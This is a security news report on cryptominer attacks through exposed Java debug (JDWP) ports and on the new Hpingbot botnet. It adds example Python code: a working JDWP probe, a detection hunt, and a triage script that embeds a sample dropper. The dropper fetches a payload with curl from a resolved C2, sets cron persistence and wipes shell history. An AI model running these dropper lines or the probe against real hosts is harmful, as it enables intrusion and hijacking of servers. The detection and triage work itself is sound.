
Threat actors are weaponizing exposed Java Debug Wire Protocol (JDWP) interfaces to obtain code execution and deploy cryptocurrency miners on compromised hosts.
“Attackers can use modified versions of XMRig with hard-coded configurations to avoid suspicious command-line arguments that are often flagged by defenders,” Wiz researchers Yaara Shriki and Gili Tikochinski said in a report published this week.
The cloud security company, which is being acquired by Google Cloud, said it observed the activity against its honeypot servers running TeamCity, a popular continuous integration and continuous delivery (CI/CD) tool.
JDWP is a communication protocol used in Java for debugging. It allows a debugger to attach to a different process, whether a Java application on the same machine or one running on a remote computer.
However, because JDWP has no authentication or access-control mechanism, exposing the service to the Internet opens up an attack vector that attackers can use as an entry point, giving them full control over the running Java process.
Simply put, the misconfiguration can be abused to inject and run arbitrary commands, set up persistence, and ultimately execute a malicious payload.

“In most Java applications, JDWP is not enabled by default, but it is commonly used in development and debugging environments,” Wiz said. “Many popular applications automatically start a JDWP server when run in debug mode. In many cases, if inappropriately exposed, this leads to remote code execution (RCE) vulnerabilities without the risk being apparent to the developer.”
Some of the applications that may start a JDWP server in debug mode include TeamCity, Jenkins, Selenium Grid, Elasticsearch, Quarkus, Spring Boot, and Apache Tomcat.
Data from GreyNoise shows over 2,600 IP addresses scanning for JDWP endpoints within the last 24 hours, of which over 1,500 are classified as malicious and 1,100 as suspicious. Most of these IP addresses originate from China, the U.S., Germany, Singapore, and Hong Kong.
In the attacks observed by Wiz, the threat actors took advantage of the fact that the Java Virtual Machine (JVM) was listening for debugger connections on port 5005, and began by scanning the Internet for open JDWP ports. In the next phase, a JDWP handshake request is sent to check whether the interface is active and to establish a JDWP session.
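The handshake-and-check step described above, written out as an added example (it is not Wiz's tooling nor the attackers' scanner): a probe sends the 14-byte ASCII string JDWP-Handshake, expects the same bytes echoed back, then issues the VirtualMachine.Version command (command set 1, command 1) and decodes the reply. The packet layout follows the JDWP specification. The in-process fake server is a constructed stand-in for a JVM started with -agentlib:jdwp so the script runs offline; the version strings it returns are made up.

```python
"""Probe a TCP port for an exposed JDWP listener: handshake, then VirtualMachine.Version.

JDWP packet layout (big-endian):
  command header = length(4) id(4) flags(1)=0    cmdset(1) cmd(1)
  reply header   = length(4) id(4) flags(1)=0x80 errorcode(2)
  string         = length(4) + UTF-8 bytes
"""
import socket
import struct
import threading

HANDSHAKE = b"JDWP-Handshake"
CMDSET_VM, CMD_VERSION = 1, 1  # VirtualMachine command set, Version command


def recv_exact(sock: socket.socket, n: int) -> bytes:
    buf = b""
    while len(buf) < n:
        chunk = sock.recv(n - len(buf))
        if not chunk:
            raise ConnectionError(f"peer closed before {n} bytes arrived")
        buf += chunk
    return buf


def jdwp_string(s: str) -> bytes:
    data = s.encode("utf-8")
    return struct.pack(">I", len(data)) + data


def build_command(pkt_id: int, cmdset: int, cmd: int, body: bytes = b"") -> bytes:
    return struct.pack(">IIBBB", 11 + len(body), pkt_id, 0, cmdset, cmd) + body


def parse_version_reply(pkt: bytes) -> dict:
    length, _pkt_id, flags, err = struct.unpack(">IIBH", pkt[:11])
    if flags != 0x80 or err != 0:
        raise ValueError(f"not a successful reply (flags={flags:#x}, error={err})")
    body, off = pkt[11:length], 0

    def read_string() -> str:
        nonlocal off
        (n,) = struct.unpack(">I", body[off:off + 4])
        off += 4
        s = body[off:off + n].decode("utf-8")
        off += n
        return s

    description = read_string()
    major, minor = struct.unpack(">ii", body[off:off + 8])
    off += 8
    return {"description": description, "jdwp_major": major, "jdwp_minor": minor,
            "vm_version": read_string(), "vm_name": read_string()}


def probe(host: str, port: int, timeout: float = 3.0):
    """Return VM details if JDWP answers; None if the handshake is not echoed back."""
    try:
        with socket.create_connection((host, port), timeout=timeout) as s:
            s.sendall(HANDSHAKE)
            if recv_exact(s, len(HANDSHAKE)) != HANDSHAKE:
                return None  # some other service (HTTP banner, SSH, ...) or silence
            s.sendall(build_command(1, CMDSET_VM, CMD_VERSION))
            header = recv_exact(s, 11)
            (length,) = struct.unpack(">I", header[:4])
            return parse_version_reply(header + recv_exact(s, length - 11))
    except OSError:  # connection refused, timeout, reset
        return None


def fake_jdwp_server():
    """Constructed stand-in for a JVM debug listener so the probe runs offline."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))
    srv.listen(1)

    def serve():
        conn, _ = srv.accept()
        with conn:
            if recv_exact(conn, len(HANDSHAKE)) == HANDSHAKE:
                conn.sendall(HANDSHAKE)
                recv_exact(conn, 11)  # the Version command carries no body
                body = (jdwp_string("Java Debug Wire Protocol (Reference Implementation) version 17.0")
                        + struct.pack(">ii", 17, 0)
                        + jdwp_string("17.0.2")            # made-up vmVersion
                        + jdwp_string("OpenJDK 64-Bit Server VM"))
                conn.sendall(struct.pack(">IIBH", 11 + len(body), 1, 0x80, 0) + body)
        srv.close()

    threading.Thread(target=serve, daemon=True).start()
    return srv.getsockname()


if __name__ == "__main__":
    host, port = fake_jdwp_server()
    print(probe(host, port))
```

An echoed handshake is the decisive check: any other service on the port fails the byte comparison, and a real JVM answers the Version command with its VM name and version, which is what an attacker learns before sending further commands. On the defensive side the relevant setting is the address part of the agent option: address=*:5005 binds every interface, while address=127.0.0.1:5005 restricts the listener to loopback; since JDK 9 a bare port (address=5005) binds loopback only, whereas JDK 8 and earlier bound it to all interfaces.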
Once the service is exposed and confirmed to be interactive, the attacker runs a curl command to fetch and execute a dropper shell script that performs the following actions:
- Drops a modified version of the XMRig miner for the appropriate system architecture from an external server (“awarmcorner[.]world”) into “~/.config/logrotate”
- Kills competing miners or any high-CPU processes
- Establishes persistence by configuring cron jobs so that the payload is downloaded again and re-executed on every shell login, reboot, or scheduled time interval
- Deletes itself on exit and re-launches itself
“Open-source XMRig offers attackers the convenience of simple customization, which involved removing all of the command-line parsing logic and hard-coding the configuration,” Wiz said. “This adjustment not only simplifies deployment but also allows the payload to mimic the original logrotate process more convincingly.”
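Because the miner's configuration is compiled in, a detection keyed on XMRig's usual command-line switches sees nothing. The following is an added example, not from the Wiz report, of a hunt that instead keys on what the text describes: a process named logrotate running from a path under a user's ~/.config directory, a dotfolder binary consuming most of a CPU, a java process whose -agentlib:jdwp option binds to all interfaces, and cron entries that re-launch the dotfolder binary. The ps output and crontab it scans are constructed sample data; the paths and user name in them are made up.

```python
"""Hunt for an XMRig build masquerading as logrotate, and for an exposed JDWP agent.

Constructed sample telemetry: a host whose JVM exposes JDWP on every interface
and whose service user runs a "logrotate" from ~/.config at full CPU.
"""
import re
from dataclasses import dataclass

# Constructed `ps -eo pid,user,pcpu,comm,args`-style output.
PS_SAMPLE = """\
  PID USER     %CPU COMMAND   ARGS
    1 root      0.0 systemd   /sbin/init
  812 root      0.1 logrotate /usr/sbin/logrotate /etc/logrotate.conf
 2231 teamcity 98.7 logrotate /home/teamcity/.config/logrotate
 2240 teamcity  0.3 java      /usr/bin/java -agentlib:jdwp=transport=dt_socket,server=y,suspend=n,address=*:5005 -jar /opt/app/server.jar
"""

# Constructed user crontab; the two dotfolder entries mimic the described persistence.
CRON_SAMPLE = """\
# m h dom mon dow command
0 3 * * * /usr/bin/find /tmp -mtime +7 -delete
@reboot /home/teamcity/.config/logrotate
*/10 * * * * /home/teamcity/.config/logrotate
"""

LEGIT_LOGROTATE = {"/usr/sbin/logrotate", "/usr/bin/logrotate"}
# address=*:PORT or address=0.0.0.0:PORT binds all interfaces. A bare address=PORT
# is loopback-only on JDK 9+ but all-interfaces on JDK 8 and earlier: check the JDK.
JDWP_ALL_INTERFACES = re.compile(r"-agentlib:jdwp=[^ ]*address=(\*|0\.0\.0\.0):\d+")
CPU_THRESHOLD = 50.0


@dataclass
class Proc:
    pid: int
    user: str
    pcpu: float
    comm: str
    args: str


def parse_ps(text: str) -> list:
    procs = []
    for line in text.splitlines()[1:]:  # skip the header row
        parts = line.split(None, 4)
        if len(parts) < 5:
            continue
        pid, user, pcpu, comm, args = parts
        procs.append(Proc(int(pid), user, float(pcpu), comm, args))
    return procs


def suspicious_processes(procs) -> list:
    """Return (pid, reason) pairs; a process may be reported more than once."""
    findings = []
    for p in procs:
        exe = p.args.split()[0]
        if p.comm == "logrotate" and exe not in LEGIT_LOGROTATE:
            findings.append((p.pid, f"logrotate name but non-system path {exe}"))
        if "/.config/" in exe and p.pcpu > CPU_THRESHOLD:
            findings.append((p.pid, f"dotfolder binary {exe} at {p.pcpu}% CPU"))
        if p.comm == "java" and JDWP_ALL_INTERFACES.search(p.args):
            findings.append((p.pid, "JDWP agent bound to all interfaces"))
    return findings


def suspicious_cron(text: str) -> list:
    """Return crontab lines that run a dotfolder binary or fetch something remotely."""
    hits = []
    for line in text.splitlines():
        s = line.strip()
        if not s or s.startswith("#"):
            continue
        if "/.config/" in s or re.search(r"\b(curl|wget)\b", s):
            hits.append(s)
    return hits


if __name__ == "__main__":
    for pid, reason in suspicious_processes(parse_ps(PS_SAMPLE)):
        print(f"pid {pid}: {reason}")
    for entry in suspicious_cron(CRON_SAMPLE):
        print(f"cron: {entry}")
```

The path check is the one that survives the hard-coded configuration: a genuine logrotate lives in /usr/sbin and is run by cron as root, so a binary of that name under a service account's home directory is worth pulling regardless of how it was invoked.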
A new Hpingbot botnet appears
NSFOCUS has detailed a new, rapidly evolving Go-based malware named Hpingbot that targets both Windows and Linux systems and can be enlisted into a botnet to launch distributed denial-of-service (DDoS) attacks using hping3, a freely available network-testing tool for crafting packets.
A notable aspect of the malware is that, unlike other trojans that usually derive from known botnet malware families such as Mirai and Gafgyt, Hpingbot is an entirely new strain. Since at least June 17, 2025, hundreds of DDoS commands have been issued, with Germany, the U.S., and Türkiye being the main targets.
“This is a new botnet family built from the ground up, demonstrating strong innovation capabilities and efficiency in using existing resources, such as distributing payloads through the online text storage and sharing platform Pastebin, or launching DDoS attacks using the network-testing tool hping3,” NSFOCUS said.

Hpingbot primarily spreads by exploiting weak SSH configurations, using an independent module that performs password-spraying attacks to obtain initial access to systems.
The presence of German debug comments in the source code may indicate that the latest version is still under testing. In a nutshell, the attack chain involves using Pastebin as a dead-drop resolver to point to an IP address (“128.0.118[.]18”) that is used to download a shell script.
This script detects the CPU architecture of the infected host, terminates any already-running version of the trojan, and fetches the main payload responsible for launching DDoS flood attacks over TCP and UDP. Hpingbot is also designed to establish persistence and cover its tracks by clearing the command history.
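The dropper behaviours described for both campaigns (the JDWP miner dropper earlier on the page: architecture selection, killing rivals, the ~/.config/logrotate drop, cron persistence, self-deletion; and the Hpingbot script: Pastebin dead-drop resolution, architecture detection, installing hping3, clearing the command history) are the kind of traits a static triage of a captured script can tag before anyone runs it. The following is an added example, not NSFOCUS or Wiz tooling. The script it scans is constructed for illustration: its Pastebin path is a placeholder and it resolves a C2 variable rather than any real host.

```python
"""Tag a captured shell dropper by the behaviours it exhibits, line by line."""
import re

# Constructed dropper for illustration. The pastebin path is a placeholder and
# $C2 is whatever the dead drop resolves to; nothing here points at real infrastructure.
SAMPLE_SCRIPT = r'''#!/bin/sh
ARCH=$(uname -m)
case "$ARCH" in
  x86_64)  BIN=x64 ;;
  aarch64) BIN=arm64 ;;
  *) exit 1 ;;
esac
C2=$(curl -s https://pastebin.com/raw/PLACEHOLDER)
pkill -f .config/logrotate
for p in $(ps -eo pid,pcpu --sort=-pcpu | awk 'NR>1 && $2>80 {print $1}'); do kill -9 "$p"; done
mkdir -p ~/.config
curl -fsSL "http://$C2/$BIN" -o ~/.config/logrotate
chmod +x ~/.config/logrotate
(crontab -l 2>/dev/null; echo "@reboot ~/.config/logrotate") | crontab -
apt -y install hping3
history -c; unset HISTFILE; rm -f ~/.bash_history
rm -f -- "$0"
'''

# One regex per behaviour named in the reporting; order is only for readable output.
RULES = {
    "arch_detect":    re.compile(r"uname -m"),
    "dead_drop":      re.compile(r"pastebin\.com/raw/"),
    "remote_fetch":   re.compile(r"\b(curl|wget)\b"),
    "kill_rivals":    re.compile(r"\b(pkill|kill -9)\b"),
    "dotdir_drop":    re.compile(r"~?/\.config/\S+"),
    "cron_persist":   re.compile(r"@reboot|crontab -"),
    "hping3_install": re.compile(r"\bapt(-get)?\b.*\binstall\b.*\bhping3\b"),
    "history_wipe":   re.compile(r"history -c|unset HISTFILE|rm .*bash_history"),
    "self_delete":    re.compile(r'\brm\b.*"\$0"'),
}


def triage(script: str) -> dict:
    """Map each matched tag to the first (line number, line) that triggered it."""
    evidence = {}
    for lineno, line in enumerate(script.splitlines(), 1):
        for tag, rx in RULES.items():
            if tag not in evidence and rx.search(line):
                evidence[tag] = (lineno, line.strip())
    return evidence


def verdict(evidence: dict, threshold: int = 4) -> str:
    """Several independent traits together are the signal; any one alone is common in admin scripts."""
    return "dropper" if len(evidence) >= threshold else "benign/unknown"


if __name__ == "__main__":
    ev = triage(SAMPLE_SCRIPT)
    for tag, (lineno, line) in ev.items():
        print(f"{tag:15s} line {lineno}: {line}")
    print("verdict:", verdict(ev))
```

The threshold matters more than any single pattern: curl, cron and uname -m appear in plenty of legitimate install scripts, but a script that also kills high-CPU processes, installs a packet-crafting tool, and wipes the shell history has no benign reading.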
In an interesting twist, the attackers have also been observed delivering another Go-based DDoS component through nodes controlled by Hpingbot. This component calls on built-in flood-attack functionality based on the UDP and TCP protocols rather than Pastebin and hping3, while relying on the same command-and-control (C2) server.
Another aspect worth noting is that while the Windows version cannot launch DDoS attacks using hping3, which is installed on Linux with the command “apt -y install hping3”, the malware's ability to drop and execute additional payloads suggests the threat actors could turn it into more than a denial-of-service tool.
“It is worth noting that the Windows version of Hpingbot cannot directly call hping3 to launch DDoS attacks, but it is frequently active, indicating that the attackers are likely focused not only on launching DDoS attacks but also on the ability to download and execute arbitrary payloads,” NSFOCUS said.